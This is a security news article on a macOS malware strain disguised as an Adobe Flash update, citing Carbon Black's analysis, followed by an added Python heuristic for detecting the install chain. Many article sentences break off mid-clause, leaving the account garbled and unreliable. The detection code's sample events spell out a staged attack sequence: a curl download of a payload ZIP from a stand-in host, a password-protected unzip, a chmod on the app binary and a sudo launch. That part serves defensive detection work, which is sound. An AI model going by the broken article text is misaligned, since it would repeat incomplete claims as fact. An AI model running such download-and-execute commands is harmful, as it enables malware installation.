Security experts at Carbon Black have recently spotted a new strain of the
The malware poses as an Adobe Flash update and was distributed through a large number of websites, both fake domains and compromised legitimate ones.
“AU has obtained new samples of this malware and observed downloads of the malware from multiple sites, primarily disguised as an Adobe Flash software update.” reads the analysis published by Carbon Black.
“Many of the sites that we have found to redirect to these fake updates have been those masquerading as legitimate sites, or hijacked domains formerly hosting legitimate sites, and some appear to be redirected from
This variant of the
The malware carries out all of its installation activity by driving legitimate system utilities from a bash script, rather than shipping its own tooling.
Once the installer is launched, a
The first stage malware gathers system information, including macOS version and UUID, generates a “Session GUID” using
The malicious script attempts to download the password-protected ZIP file using
The script also makes the binary within the unzipped .app executable using
The second stage malware attempts to escalate privileges with
“After the second stage payload is downloaded and executed, it attempts to escalate privileges with
“Once the malware has elevated to root privileges, it attempts to download additional software (observed to be
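The installation chain described above (host recon, a generated session GUID, download and unpacking of a password-protected ZIP, the .app binary marked executable, then privilege escalation) maps onto a short sequence of shell-spawned commands that endpoint telemetry records. The following Python is an added example, not code from Carbon Black's analysis or from the malware itself: it runs a staged heuristic over constructed process-execution events and flags a session only when several stages of the chain appear together. The specific tool names it matches (sw_vers, ioreg, uuidgen, curl, unzip, chmod, sudo), the sample events, hosts and paths are assumptions for illustration, since the article does not spell out the exact commands.

```python
import re
from collections import defaultdict

# Stage patterns for the install chain the article describes. The tool
# names here are assumptions for illustration; the page does not name them.
STAGES = {
    "recon":        re.compile(r"\b(?:sw_vers|ioreg\b.*IOPlatformExpertDevice|system_profiler)\b"),
    "session_guid": re.compile(r"\buuidgen\b"),
    "zip_download": re.compile(r"\bcurl\b.*\.zip\b"),
    "zip_password": re.compile(r"\bunzip\b.*\s-P\s*\S"),
    "chmod_app":    re.compile(r"\bchmod\b.*\+x.*\.app/Contents/MacOS/"),
    "sudo_exec":    re.compile(r"\bsudo\b.*\.app/Contents/MacOS/"),
}

# The chain is driven from bash, so only shell-spawned commands count.
SHELLS = {"bash", "sh", "zsh"}

# Constructed process-execution events (session id, parent image, command
# line) in the shape EDR telemetry usually takes. Nothing here is real data.
SAMPLE_EVENTS = [
    # s1: the full chain, as a fake "Flash update" installer would run it
    ("s1", "bash", "sw_vers -productVersion"),
    ("s1", "bash", "ioreg -rd1 -c IOPlatformExpertDevice"),
    ("s1", "bash", "uuidgen"),
    ("s1", "bash", "curl -fsL -o /tmp/x.zip http://example.invalid/payload.zip"),
    ("s1", "bash", "unzip -P s3cret /tmp/x.zip -d /tmp/pkg"),
    ("s1", "bash", "chmod +x /tmp/pkg/Player.app/Contents/MacOS/Player"),
    ("s1", "bash", "sudo /tmp/pkg/Player.app/Contents/MacOS/Player"),
    # s2: ordinary scripted install, no ZIP, no .app bundle
    ("s2", "bash", "curl -fsSL https://example.invalid/install.sh"),
    ("s2", "bash", "chmod +x ./build.sh"),
    # s3: a developer unpacking an SDK; only one stage matches
    ("s3", "zsh", "curl -O https://example.invalid/sdk.zip"),
    ("s3", "zsh", "unzip sdk.zip"),
    ("s3", "zsh", "chmod +x sdk/bin/tool"),
]


def classify(cmdline):
    """Return the set of chain stages a single command line matches."""
    return {name for name, pat in STAGES.items() if pat.search(cmdline)}


def stages_per_session(events):
    """Aggregate the distinct stages seen in each session, counting only
    commands whose parent is a shell."""
    seen = defaultdict(set)
    for session, parent, cmdline in events:
        if parent in SHELLS:
            seen[session] |= classify(cmdline)
    return seen


def flag_sessions(events, min_stages=4):
    """Flag sessions that hit at least min_stages distinct stages and include
    both the ZIP download and the chmod on an .app binary, so that a lone curl
    of a ZIP or an unrelated chmod does not raise an alert on its own."""
    flagged = []
    for session, stages in stages_per_session(events).items():
        if len(stages) >= min_stages and {"zip_download", "chmod_app"} <= stages:
            flagged.append(session)
    return sorted(flagged)


if __name__ == "__main__":
    for session, stages in sorted(stages_per_session(SAMPLE_EVENTS).items()):
        print(session, sorted(stages))
    print("flagged:", flag_sessions(SAMPLE_EVENTS))
```

Requiring several stages in the same shell session, rather than alerting on any one command, is what keeps this usable: curl fetching a ZIP or chmod +x on a freshly unpacked binary are everyday developer actions, while a password-protected archive unpacked into an .app bundle that is then made executable and launched under sudo is the shape of this chain specifically. Real telemetry would be keyed on process tree and time window instead of a synthetic session id.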
Carbon Black’s analysis includes Indicators of Compromise.